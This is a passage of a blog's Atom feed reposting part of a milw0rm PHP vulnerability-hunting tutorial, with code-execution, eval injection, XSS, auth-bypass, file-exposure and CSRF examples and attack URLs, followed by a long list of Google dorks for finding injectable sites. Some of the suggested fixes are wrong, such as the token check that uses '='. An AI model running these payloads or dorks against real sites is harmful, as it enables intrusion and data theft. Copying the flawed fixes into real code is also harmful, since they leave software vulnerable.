&lt;br /&gt;          We set the location value to "",close the first php tags,open the tags&lt;br /&gt;         again,wrote our evil code,close the tags and open other and add a variable&lt;br /&gt;         "xxx" because we dont want any error.I wrote that code because I want no&lt;br /&gt;         error,can be modified to be small but will give some errors(will not&lt;br /&gt;         stop us to execute commands but looks ugly).&lt;br /&gt;		 &lt;br /&gt;		 So if we make the following request :&lt;br /&gt;		&lt;br /&gt;		    http://127.0.0.1/sites/ourusername.php?cmd=whoami&lt;br /&gt;			&lt;br /&gt;	     And our command will be succesfully executed.&lt;br /&gt;		&lt;br /&gt;		&lt;br /&gt;	   8.3 - How to fix&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	        Simple way : Don't allow user input .&lt;br /&gt;		    Another way : Use escapeshellarg() and escapeshellcmd() functions .&lt;br /&gt;		                 Example : $cmd=escapeshellarg($_GET'cmd']);&lt;br /&gt;  &lt;br /&gt;	&lt;br /&gt;	 9) Remote Code Execution&lt;br /&gt;	&lt;br /&gt;	   &lt;br /&gt;		 - Tips : You must inject valid PHP code including terminating statements ( ; ) .&lt;br /&gt;	&lt;br /&gt;	   &lt;br /&gt;	   9.0 - Basic example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      - Code snippet from test.php&lt;br /&gt;		 &lt;br /&gt;		  -----------------------------------&lt;br /&gt;		   &lt;?php&lt;br /&gt;		   $code=$_GET['code'];&lt;br /&gt;		   eval($code);&lt;br /&gt;		   ?&gt;&lt;br /&gt;		   -----------------------------------&lt;br /&gt;	      &lt;br /&gt;	      The "eval" function evaluate a string as PHP code.So in this case we are able to execute&lt;br /&gt;		 our PHP code.Examples :&lt;br /&gt;		&lt;br /&gt;		    http://127.0.0.1/test.php?code=phpinfo();&lt;br /&gt;			http://127.0.0.1/test.php?code=system(whoami);&lt;br /&gt;			&lt;br /&gt;		  And we will see the output of the PHP code injected by us.&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;	   9.1 - Simple example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      - Code snippet from system/services/init.php&lt;br /&gt;		 &lt;br /&gt;		  ------------------------------------------------&lt;br /&gt;		  $conf = array_merge($conf,$confweb);&lt;br /&gt;		  }&lt;br /&gt;		  @eval(stripslashes($_REQUEST['anticode']));&lt;br /&gt;         if ( $_SERVER['HTTP_CLIENT_IP'] )&lt;br /&gt;		  ------------------------------------------------&lt;br /&gt;		 &lt;br /&gt;		   We see that the "anticode" is requested by $_REQUEST method and the coder&lt;br /&gt;		  "secured" the input with "stripslashes" which is useless here,we don't need&lt;br /&gt;		  slashes to execute our php code only if we want to include a URL.So we can&lt;br /&gt;		  inject our PHP code.Example :&lt;br /&gt;		 &lt;br /&gt;		    http://127.0.0.1/test.php?anticode=phpinfo();&lt;br /&gt;			&lt;br /&gt;		  Great,injection done,phpinfo() result printed.No include because slashes are&lt;br /&gt;		  removed,but we can use system() or another function to execute commands.&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	   9.2 - How to fix&lt;br /&gt;	  &lt;br /&gt;	        &lt;br /&gt;           Simple way : Don't allow ";" and the PHP code will be invalid.&lt;br /&gt;			Another way : Don't allow any special char like "(" or ")" etc.&lt;br /&gt;			&lt;br /&gt;			&lt;br /&gt;	 10) Cross-Site Scripting&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	     - Tips : You can use alot of vectors,can try alot of bypass methods,you cand&lt;br /&gt;		        find them around the web.&lt;br /&gt;				&lt;br /&gt;				&lt;br /&gt;	   10.0 - Basic example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      - Code snippet from test.php&lt;br /&gt;		 &lt;br /&gt;		  ---------------------------------&lt;br /&gt;		   &lt;?php&lt;br /&gt;		   $name=$_GET['name'];&lt;br /&gt;		   print $name;&lt;br /&gt;		   ?&gt;&lt;br /&gt;	       ---------------------------------&lt;br /&gt;		  &lt;br /&gt;		    The input is not filtered,an attacker can inject JavaScript code.Example :&lt;br /&gt;	  &lt;br /&gt;	           http://127.0.0.1/test.php?name=&lt;script&gt;alert("XSS")&lt;/script&gt;&lt;br /&gt;			  &lt;br /&gt;			A popup with XSS message will be displayed.JavaScript code succesfully executed.&lt;br /&gt;			&lt;br /&gt;			&lt;br /&gt;	   10.1 - Another example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      - Code snippet from test.php&lt;br /&gt;		 &lt;br /&gt;		   -------------------------------------------&lt;br /&gt;		    &lt;?php&lt;br /&gt;		    $name=addslashes($_GET['name']);&lt;br /&gt;		    print '&lt;table name="'.$name.'"&gt;&lt;/table&gt;';&lt;br /&gt;		    ?&gt;&lt;br /&gt;		   -------------------------------------------&lt;br /&gt;		  &lt;br /&gt;		   Not an advanced example,only a bit complicated.&lt;br /&gt;			&lt;br /&gt;			http://127.0.0.1/test.php?name="&gt;&lt;script&gt;alert(String.fromCharCode(88,83,83))&lt;/script&gt;&lt;br /&gt;			&lt;br /&gt;		   Why this vector?We put " because we must close the " from the "name" atribut&lt;br /&gt;		  of the "table" tag and &gt; to close the "table" tag.Why String.fromCharCode?Because&lt;br /&gt;		  we want to bypass addslashes() function.Injection done.&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;	   10.2 - Simple example&lt;br /&gt;	  &lt;br /&gt;	     &lt;br /&gt;		   - Code snippet from modules.php&lt;br /&gt;		  &lt;br /&gt;		   ---------------------------------------------------------------------------&lt;br /&gt;		   if (isset($name)) {&lt;br /&gt;		   .................... etc................&lt;br /&gt;		   } else {&lt;br /&gt;		   die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");&lt;br /&gt;		   ---------------------------------------------------------------------------&lt;br /&gt;		  &lt;br /&gt;		   The "name" variable is injectable,input is not filtered,so we can inject&lt;br /&gt;		  with ease JavaScript code.Example :&lt;br /&gt;		  &lt;br /&gt;		        http://127.0.0.1/test.php?name=&lt;script&gt;alert("XSS")&lt;/script&gt;&lt;br /&gt;				&lt;br /&gt;				&lt;br /&gt;	   10.3 - How to fix&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	          Simple way : Use htmlentities() or htmlspecialchars() functions.&lt;br /&gt;			              Example : $name=htmlentities($_GET['name']);&lt;br /&gt;			  Another way : Filter all special chars used for XSS ( a lot ).&lt;br /&gt;			              The best way is the first method.&lt;br /&gt;						 &lt;br /&gt;						 &lt;br /&gt;	 11) Authentication Bypass	&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	     - Tips : Look deep in the scripts,look in the admin directories,&lt;br /&gt;		        maybe are not protected,also look for undefined variables&lt;br /&gt;				like "login" or "auth".&lt;br /&gt;				&lt;br /&gt;	  &lt;br /&gt;	   11.0 - Basic example&lt;br /&gt;	  &lt;br /&gt;	      &lt;br /&gt;		   I will provide a simple example of authentication bypass&lt;br /&gt;		  via login variable.&lt;br /&gt;		 &lt;br /&gt;		   - Code snippet from test.php&lt;br /&gt;		  &lt;br /&gt;		   ---------------------------------&lt;br /&gt;		   &lt;?php&lt;br /&gt;		   if ($logged==true) {&lt;br /&gt;		   echo 'Logged in.'; }&lt;br /&gt;		   else {&lt;br /&gt;		   print 'Not logged in.';&lt;br /&gt;		   }&lt;br /&gt;		   ?&gt;&lt;br /&gt;		   ---------------------------------&lt;br /&gt;		  &lt;br /&gt;		    Here we need register_gloabals = on . I will talk about php.ini&lt;br /&gt;		  settings a bit later in this tutorial.If we set the value of $logged&lt;br /&gt;		  variable to 1 the if condition will be true and we are logged in.&lt;br /&gt;		    Example :&lt;br /&gt;			&lt;br /&gt;			  http://127.0.0.1/test/php?logged=1&lt;br /&gt;			&lt;br /&gt;		    And we are logged in.&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;	   11.1 - Via login variable&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;		 - Code snippet from login.php&lt;br /&gt;		&lt;br /&gt;		 ------------------------------------------------------------------------------------&lt;br /&gt;		 if ($login_ok)&lt;br /&gt;		 {&lt;br /&gt;		 $_SESSION['loggato'] = true;&lt;br /&gt;		 echo "&lt;p&gt;$txt_pass_ok&lt;/p&gt;";&lt;br /&gt;		 echo"&lt;div align="'center'"&gt;&lt;a href="'index.php'"&gt;$txt_view_entry&lt;/a&gt; |&lt;br /&gt;		 &lt;a href="'admin.php'"&gt;$txt_delete-$txt_edit&lt;/a&gt; | &lt;a href="'install.php'"&gt;$txt_install&lt;br /&gt;		 &lt;/a&gt;&lt;/div&gt;";&lt;br /&gt;		 }&lt;br /&gt;		 ------------------------------------------------------------------------------------&lt;br /&gt;		&lt;br /&gt;		  Lets see.If the "login_ok" variable is TRUE ( 1 ) the script set us a SESSION who&lt;br /&gt;        tell to the script that we are logged in.So lets set the "login_ok" variable to TRUE.&lt;br /&gt;		  Example :&lt;br /&gt;		 &lt;br /&gt;		     http://127.0.0.1/login.php?login_ok=1&lt;br /&gt;			&lt;br /&gt;		  Now we are logged in.&lt;br /&gt;		 &lt;br /&gt;		 &lt;br /&gt;	   11.2 - Unprotected Admin CP&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;          You couln't belive this but some PHP scrips don't protect the admin&lt;br /&gt;		  control panel : no login,no .htaccess,nothing.So we simply we go to&lt;br /&gt;		  the admin panel directory and we take the control of the website.&lt;br /&gt;		   Example :&lt;br /&gt;		  &lt;br /&gt;		      http://127.0.0.1/admin/files.php&lt;br /&gt;			 &lt;br /&gt;			We accessed the admin panel with a simple request.&lt;br /&gt;			&lt;br /&gt;			&lt;br /&gt;	   11.3 - How to fix&lt;br /&gt;	 &lt;br /&gt;	 &lt;br /&gt;	      - Login variable bypass : Use a REAL authentication system,don't check the&lt;br /&gt;		                          login like that,use SESSION verification.Example :&lt;br /&gt;		  &lt;br /&gt;		      if($_SESSION['logged']==1) {&lt;br /&gt;			  echo 'Logged in'; }&lt;br /&gt;			  else { echo 'Not logged in';&lt;br /&gt;			  }&lt;br /&gt;		 &lt;br /&gt;		  - Unprotected Admin CP : Use an authentication system or use .htaccess to&lt;br /&gt;		                          allow access from specific IP's or .htpasswd to&lt;br /&gt;								  request an username and a password for admin CP.&lt;br /&gt;								  Example :&lt;br /&gt;								 &lt;br /&gt;				.htaccess :&lt;br /&gt;				&lt;br /&gt;				    order deny, allow&lt;br /&gt;				    deny from all&lt;br /&gt;				    allow from 127.0.0.1&lt;br /&gt;				&lt;br /&gt;				.htpasswd :&lt;br /&gt;				&lt;br /&gt;				    AuthUserFile /the/path/.htpasswd&lt;br /&gt;				    AuthType Basic&lt;br /&gt;				    AuthName "Admin CP"&lt;br /&gt;				    Require valid-user&lt;br /&gt;					&lt;br /&gt;					and /the/path/.htpasswd&lt;br /&gt;					&lt;br /&gt;					sirgod:$apr1$wSt1u...$6yvagxWk.Ai2bD6s6O9iQ.&lt;br /&gt;					&lt;br /&gt;					&lt;br /&gt;	 12) Insecure Permissions&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	     Tips : Look deep into the files,look if the script request to be&lt;br /&gt;		      logged in to do something,maybe the script don't request.&lt;br /&gt;			    Watch out for insecure permissions,maybe you can do admin&lt;br /&gt;			  things without login.&lt;br /&gt;			 &lt;br /&gt;			 &lt;br /&gt;	   12.0 - Basic example&lt;br /&gt;	  &lt;br /&gt;	     &lt;br /&gt;		  We are thinking at a script who let the admin to have a lookup in&lt;br /&gt;		 the users database through a file placed in /admin directory.That&lt;br /&gt;		 file is named...hmmm : db_lookup.php.&lt;br /&gt;		&lt;br /&gt;		  - Code snippet from admin/db_lookup.php&lt;br /&gt;		 &lt;br /&gt;		  --------------------------------------------&lt;br /&gt;		  &lt;?php&lt;br /&gt;		  // Lookup in the database&lt;br /&gt;		  readfile('protected/usersdb.txt');&lt;br /&gt;		  ?&gt;&lt;br /&gt;		  --------------------------------------------&lt;br /&gt;		 &lt;br /&gt;		   Lets think.We cannot access the "protected" directory because&lt;br /&gt;		  is .htaccess'ed.But look at this file,no logged-in check,nothing.&lt;br /&gt;		  So if we acces :&lt;br /&gt;		 &lt;br /&gt;		    http://127.0.0.1/admin/db_lookup.php&lt;br /&gt;			&lt;br /&gt;		  We can see the database.Remember,this is only an example created by&lt;br /&gt;		 me,not a real one,you can find this kind of vulnerabilities in scripts.&lt;br /&gt;		&lt;br /&gt;		&lt;br /&gt;	   12.1 - Read the users/passwords&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      Oh yeah,some coders are so stupid.They save the usernames and passwords&lt;br /&gt;		 in text files,UNPROTECTED.A simple example from a script :&lt;br /&gt;		&lt;br /&gt;		    http://127.0.0.1/userpwd.txt&lt;br /&gt;			&lt;br /&gt;		  And we read the file,the usernames and passwords are there.&lt;br /&gt;&lt;br /&gt;	  &lt;br /&gt;	   12.2 - Download Backups&lt;br /&gt;		  &lt;br /&gt;&lt;br /&gt;		    Some scripts have database backup functions,some are safe,some are not safe.&lt;br /&gt;			I will show you a real script example :&lt;br /&gt;			&lt;br /&gt;			 - Code snippet from /adminpanel/phpmydump.php&lt;br /&gt;			&lt;br /&gt;			 --------------------------------------------------------------------------------&lt;br /&gt;			 function mysqlbackup($host,$dbname, $uid, $pwd, $structure_only, $crlf) { &lt;br /&gt;			 $con=@mysql_connect("localhost",$uid, $pwd) or die("Could not connect"); &lt;br /&gt;			 $db=@mysql_select_db($dbname,$con) or die("Could not select db");&lt;br /&gt;			 .............................. etc ..........................&lt;br /&gt;			  mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);&lt;br /&gt;			 --------------------------------------------------------------------------------&lt;br /&gt;			&lt;br /&gt;			After a lof of code the function is called.I don't pasted the entire code&lt;br /&gt;		  because is huge.I analyzed the script,no login required,no check,nothing.So&lt;br /&gt;		  if we access the file directly the download of the backup will start.Example :&lt;br /&gt;		 &lt;br /&gt;		      http://127.0.0.1/adminpanel/phpmydump.php&lt;br /&gt;			 &lt;br /&gt;		   Now we have the database backup saved in our computer.&lt;br /&gt;		  &lt;br /&gt;		 &lt;br /&gt;      12.3 - INC files&lt;br /&gt;		&lt;br /&gt;		&lt;br /&gt;		   Some scripts saves important data in INC files.Usually in INC files is PHP&lt;br /&gt;		  code containing database configuration.The INC files can be viewed in&lt;br /&gt;		  browser even they contain PHP code.So a simple request will be enough to&lt;br /&gt;		  access and read the file.Example :&lt;br /&gt;		 &lt;br /&gt;		      http://127.0.0.1/inc/mysql.inc&lt;br /&gt;			 &lt;br /&gt;		   Now we have the database connection details.Look deep in scripts,is more&lt;br /&gt;		  scripts who saves important data into INC files.&lt;br /&gt;		&lt;br /&gt;		  &lt;br /&gt;	   12.4 - How to fix&lt;br /&gt;		                  &lt;br /&gt;		  &lt;br /&gt;		    - Basic example : Check if the admin is logged in,if not,redirect.&lt;br /&gt;			&lt;br /&gt;			- Read the users/passwords : Save the records in a MySQL database&lt;br /&gt;			                           or in a protected file/directory.&lt;br /&gt;									  &lt;br /&gt;		    - Download Backups : Check if the admin is logged in,if not,redirect.&lt;br /&gt;			&lt;br /&gt;			- INC files : Save the configuration in proper files,like .php or&lt;br /&gt;			           protect the directory with an .htaccess file.&lt;br /&gt;		    &lt;br /&gt;	&lt;br /&gt;	 13) Cross Site Request Forgery&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	    - Tips : Through CSRF you can change the admin password,is not&lt;br /&gt;		       so inofensive.&lt;br /&gt;			     Can be used with XSS,redirected from XSS.&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	   13.0 - Basic example&lt;br /&gt;	  &lt;br /&gt;	     &lt;br /&gt;		   - Code snippet from test.php&lt;br /&gt;		  &lt;br /&gt;		   -----------------------------------------&lt;br /&gt;		   &lt;?php&lt;br /&gt;		   check_auth();&lt;br /&gt;		   if(isset($_GET['news']))&lt;br /&gt;		   { unlink('files/news'.$news.'.txt'); }&lt;br /&gt;		   else {&lt;br /&gt;		   die('File not deleted'); }&lt;br /&gt;		   ?&gt;&lt;br /&gt;		   -----------------------------------------&lt;br /&gt;		  &lt;br /&gt;		    In this example you will see what is CSRF and how it works.In the "files"&lt;br /&gt;		   directory are saved the news written by the author.The news are saved like&lt;br /&gt;		   "news1.txt","news2.txt" etc. So the admin can delete the news.The news that&lt;br /&gt;		   he want to delete will be specified in "news" variable.If he want to delete&lt;br /&gt;		   the news1.txt the value of "news" will be "1".We cannot execute this without&lt;br /&gt;		   admin permissions,look,the script check if we are logged in.&lt;br /&gt;		    I will show you an example.If we request :&lt;br /&gt;			&lt;br /&gt;			   http://127.0.0.1/test.php?news=1&lt;br /&gt;			  &lt;br /&gt;			The /news/news1.txt file will be deleted.The script directly delete the file&lt;br /&gt;		   without any notice.So we can use this to delete a file.All we need is to trick&lt;br /&gt;		   the admin to click our evil link and the file specified by us in the "news"&lt;br /&gt;		   variable will be deleted.&lt;br /&gt;		  &lt;br /&gt;		  &lt;br /&gt;	   13.1 - Simple example&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      In a way the codes below are included in the index.php file ,I&lt;br /&gt;		 will not paste all the includes,there are a lot.&lt;br /&gt;	  &lt;br /&gt;          - Code snippet from includes/pages/admin.php&lt;br /&gt;&lt;br /&gt;          --------------------------------------------------------------------&lt;br /&gt;          if ($_GET['act'] == '') {&lt;br /&gt;          include "includes/pages/admin/home.php";&lt;br /&gt;          } else {&lt;br /&gt;          include "includes/pages/admin/" . $_GET['act'] . ".php";&lt;br /&gt;		   --------------------------------------------------------------------&lt;br /&gt;		 &lt;br /&gt;		  Here we can see how the "includes/pages/admin/members.php" is included in&lt;br /&gt;		 this file.If "act=members" the file below will be included.&lt;br /&gt;		  &lt;br /&gt;	     &lt;br /&gt;		   - Code snippet from includes/pages/admin/members.php&lt;br /&gt;		  &lt;br /&gt;		   ----------------------------------------------------------------------------------------------&lt;br /&gt;		   if ($_GET['func'] == 'delete') {&lt;br /&gt;		   $del_id = $_GET['id'];&lt;br /&gt;		   $query2121 = "select ROLE from {$db_prefix}members WHERE ID='$del_id'";&lt;br /&gt;		   $result2121 = mysql_query($query2121) or die("delete.php - Error in query: $query2121");&lt;br /&gt;		   while ($results2121 = mysql_fetch_array($result2121)) {&lt;br /&gt;		   $their_role = $results2121['ROLE'];&lt;br /&gt;		   }&lt;br /&gt;		   if ($their_role != '1') {&lt;br /&gt;          mysql_query("DELETE FROM {$db_prefix}members WHERE id='$del_id'") or die(mysql_error&lt;br /&gt;          ());&lt;br /&gt;		   ----------------------------------------------------------------------------------------------&lt;br /&gt;		  &lt;br /&gt;		   We can see here that if "func=delete" will be called by URL,the script will&lt;br /&gt;		  delete from the database a user with the specified ID ( $id ) without any&lt;br /&gt;		  confirmation.Example :&lt;br /&gt;		 &lt;br /&gt;		    http://127.0.0.1/index.php?page=admin&amp;amp;act=members&amp;amp;func=delete&amp;amp;id=4&lt;br /&gt;			&lt;br /&gt;		  The script check if the admin is logged in so if we trick the admin to click&lt;br /&gt;		 our evil link the user who have the specified ID in the database will be deleted&lt;br /&gt;		 without any confirmation.&lt;br /&gt;				  &lt;br /&gt;	&lt;br /&gt;	   13.2 - How to fix	&lt;br /&gt;	  &lt;br /&gt;	  &lt;br /&gt;	      - Simple way : Use tokens.At each login,generate a random token and save it&lt;br /&gt;		                in the session.Request the token in URL to do administrative&lt;br /&gt;						actions,if the token missing or is wrong,don't execute the&lt;br /&gt;						action.I will show you only how to to check if the token&lt;br /&gt;                                               is present and is correct.Example :&lt;br /&gt;&lt;br /&gt;								 -------------------------------------------------------					&lt;br /&gt;								  &lt;?php&lt;br /&gt;								  check_auth();&lt;br /&gt;								  if(isset($_GET['news']) &amp;amp;&amp;amp; $token=$_SESSION['token'])&lt;br /&gt;								  { unlink('files/news'.$news.'.txt'); }&lt;br /&gt;								  else {&lt;br /&gt;								  die('Error.'); }&lt;br /&gt;								  ?&gt;&lt;br /&gt;								  -------------------------------------------------------&lt;br /&gt;								 &lt;br /&gt;						The request will look like this one :&lt;br /&gt;						&lt;br /&gt;						    http://127.0.0.1/index.php?delete=1&amp;amp;token=[RANDOM_TOKEN]&lt;br /&gt;								 &lt;br /&gt;						So this request will be fine,the news will be deleted.&lt;br /&gt;										&lt;br /&gt;			&lt;br /&gt;		  - Another way : Do some complicated confirmations or request a password&lt;br /&gt;		                 to do administrative actions.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;        14) Shoutz&lt;br /&gt;&lt;br /&gt;		&lt;br /&gt;             Shoutz to all www.insecurity.ro &amp;amp; www.h4cky0u.org members.If you have some suggestions or&lt;br /&gt;           questions just email me.		&lt;br /&gt;&lt;br /&gt;sources : http://milw0rm.com/papers/381&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-09-09]&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5810858978506140718-6351603963867131112?l=jerichositumorang.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jerichositumorang.blogspot.com/feeds/6351603963867131112/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5810858978506140718&amp;postID=6351603963867131112' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5810858978506140718/posts/default/6351603963867131112'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5810858978506140718/posts/default/6351603963867131112'/><link rel='alternate' type='text/html' href='http://jerichositumorang.blogspot.com/2010/04/finding-vulnerabilities-in-php-scripts.html' title='Finding vulnerabilities in PHP scripts FULL'/><author><name>Jericho PS</name><uri>http://www.blogger.com/profile/10905013783242426389</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_8QcVoMNZWbc/TI5GPFjwDGI/AAAAAAAAABk/MKgAwcHpGxM/S220/100_2302+(Small).JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5810858978506140718.post-9213785786430384824</id><published>2009-08-07T10:25:00.000-07:00</published><updated>2009-08-07T10:26:43.745-07:00</updated><title type='text'>Main-main ke blog yang lain</title><content type='html'>&lt;span class="fullpost"&gt;duhh dah lama ga nulis. maen-maen juga ya ke http://jericho.at.ua&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5810858978506140718-9213785786430384824?l=jerichositumorang.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jerichositumorang.blogspot.com/feeds/9213785786430384824/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5810858978506140718&amp;postID=9213785786430384824' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5810858978506140718/posts/default/9213785786430384824'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5810858978506140718/posts/default/9213785786430384824'/><link rel='alternate' type='text/html' href='http://jerichositumorang.blogspot.com/2009/08/main-main-ke-blog-yang-lain.html' title='Main-main ke blog yang lain'/><author><name>Jericho PS</name><uri>http://www.blogger.com/profile/10905013783242426389</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_8QcVoMNZWbc/TI5GPFjwDGI/AAAAAAAAABk/MKgAwcHpGxM/S220/100_2302+(Small).JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5810858978506140718.post-198097036557589930</id><published>2009-05-01T04:52:00.000-07:00</published><updated>2009-05-25T14:53:56.427-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLi dork'/><category scheme='http://www.blogger.com/atom/ns#' term='SQLi'/><title type='text'>SQLi Dork</title><content type='html'>&lt;span class="fullpost"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;Beberapa SQL injection dork:&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;!scan side.php?arq= allinurl:.php?arq=&lt;br /&gt;!scan side.php?table= allinurl:.php?table=&lt;br /&gt;!scan side.php?vis= allinurl:.php?vis=&lt;br /&gt;!scan side.php?vis= allinurl:side.php?vis=&lt;br /&gt;!scan site.php?arq= allinurl:.php?arq=&lt;br /&gt;!scan site.php?meio= allinurl:.php?meio=&lt;br /&gt;!scan site.php?table= allinurl:.php?table=&lt;br /&gt;!scan s.php?table= allinurl:.php?table=&lt;br /&gt;!scan start.php?id= allinurl:".php?id="&lt;br /&gt;!scan start.php?id= allinurl:"start.php?id="&lt;br /&gt;!scan start.php?id= allinurl:start.php?id=&lt;br /&gt;!scan start.php?lang= allinurl:".php?lang="&lt;br /&gt;!scan start.php?lang= allinurl:"start.php?lang="&lt;br /&gt;!scan start.php?lang= allinurl:start.php?lang=&lt;br /&gt;!scan start.php?lang= .php?lang=&lt;br /&gt;!scan start.php?lang= start.php?lang=&lt;br /&gt;!scan start.php?mod= allinurl:".php?mod="&lt;br /&gt;!scan start.php?mod= allinurl:"start.php?mod="&lt;br /&gt;!scan start.php?page= allinurl:".php?page="&lt;br /&gt;!scan start.php?page= allinurl:"start.php?page="&lt;br /&gt;!scan start.php?page= start.php?page=&lt;br /&gt;!scan start.php?pag= start.php?pag=&lt;br /&gt;!scan start.php?pg= start.php?pg=&lt;br /&gt;!scan start.php?p= start.php?p=&lt;br /&gt;!scan start.php?s= allinurl:".php?s="&lt;br /&gt;!scan start.php?s= allinurl:"start.php?s="&lt;br /&gt;!scan start.php?s= allinurl:start.php?s=&lt;br /&gt;!scan start.php?s= start.php?s=&lt;br /&gt;!scan str.php?lang= str.php?lang=&lt;br /&gt;!scan str.php?ln= str.php?ln=&lt;br /&gt;!scan str.php?l= str.php?l=&lt;br /&gt;!scan str.php?page= str.php?page=&lt;br /&gt;!scan str.php?p= str.php?p=&lt;br /&gt;!scan sub.php?menu= "sub.php?menu="&lt;br /&gt;!scan sub.php?menu= sub.php?menu=&lt;br /&gt;!scan sub.php?s= "sub.php?s="&lt;br /&gt;!scan sub.php?s= sub.php?s=&lt;br /&gt;!scan sub.php?sub= "sub.php?sub="&lt;br /&gt;!scan sub.php?sub= sub.php?sub=&lt;br /&gt;!scan task.php?task= allinurl:.php?task=&lt;br /&gt;!scan task.php?task= allinurl:task.php?task=&lt;br /&gt;!scan /templates/mangobery/footer.sample.php?Site_Path= Mangobery&lt;br /&gt;!scan /templates/mangobery/footer.sample.php?Site_Path= Mangobery 0.5.5&lt;br /&gt;!scan /templates/mangobery/footer.sample.php?Site_Path= Mangobery-0.5.5&lt;br /&gt;!scan trans.php?trans= allinurl:".php?trans="&lt;br /&gt;!scan trans.php?trans= allinurl:"trans.php?trans="&lt;br /&gt;!scan /trans/trans.php?trans=eng&amp;amp;page= allinurl:".php?trans="&lt;br /&gt;!scan /trans/trans.php?trans=en&amp;amp;page= allinurl:".php?trans="&lt;br /&gt;!scan /trans/trans.php?trans=fr&amp;amp;page= allinurl:".php?trans="&lt;br /&gt;!scan /trans/trans.php?trans=ko&amp;amp;page= allinurl:".php?trans="&lt;br /&gt;!scan /trans/trans.php?trans=&amp;amp;page= allinurl:".php?trans="&lt;br /&gt;!scan /trans/trans.php?trans=&amp;amp;p= allinurl:".php?trans="&lt;br /&gt;!scan view.php?sub= "view.php?sub="&lt;br /&gt;!scan view.php?sub= view.php?sub=&lt;br /&gt;!scan view.php?table= allinurl:.php?table=&lt;br /&gt;!scan voir.php?inc= allinurl:".php?adid="&lt;br /&gt;!scan werbungFrame.php?do= allinurl:".php?do="&lt;br /&gt;!scan /ws/get_events.php?includedir= "WebCalendar"&lt;br /&gt;!scan /ws/get_events.php?includedir= Web Calendar&lt;br /&gt;!scan /ws/get_events.php?includedir= WebCalendar&lt;br /&gt;!scan /ws/get_events.php?includedir= WebCalendar v0.9.45&lt;br /&gt;!scan /ws/get_reminders.php?includedir= WebCalendar&lt;br /&gt;!scan /ws/get_reminders.php?includedir= WebCalendar v0.9.45&lt;br /&gt;!scan /ws/login.php?includedir= WebCalendar&lt;br /&gt;!scan /ws/login.php?includedir= WebCalendar v0.9.45&lt;br /&gt;!scan ocp-103/index.php?req_path= ocPortal&lt;br /&gt;!scan images/evil.php?owned= e107&lt;br /&gt;!scan index.php?ver= allinurl:.php?ver=&lt;br /&gt;!scan index.php?ver= allinurl:".php?ver="&lt;br /&gt;!scan index.php?ver= .php?ver=&lt;br /&gt;!scan /index.php?vis= allinurl:/index.php?vis=&lt;br /&gt;!scan /index.php?vis= allinurl:.php?vis=&lt;br /&gt;!scan index.php?way= index.php?way=&lt;br /&gt;!scan index.php?way= .php?way=&lt;br /&gt;!scan index.php?wpage= allinurl:"index.php?wpage="&lt;br /&gt;!scan index.php?wpage= allinurl:".php?wpage="&lt;br /&gt;!scan info.php?ln= allinurl:"info.php?ln="&lt;br /&gt;!scan info.php?ln= allinurl:info.php?ln=&lt;br /&gt;!scan info.php?ln= allinurl:".php?ln="&lt;br /&gt;!scan /interna.php?meio= allinurl:".php?meio="&lt;br /&gt;!scan kalender.php?vis= allinurl:"kalender.php"&lt;br /&gt;!scan kalender.php?vis= allinurl:"kalender.php?vis="&lt;br /&gt;!scan kalender.php?vis= allinurl:".php?vis="&lt;br /&gt;!scan lang.php?arg= allinurl:.php?arg=&lt;br /&gt;!scan lang.php?arq= allinurl:.php?arq=&lt;br /&gt;!scan lang.php?lk= allinurl:".php?lk="&lt;br /&gt;!scan lang.php?ln= allinurl:.php?ln=&lt;br /&gt;!scan 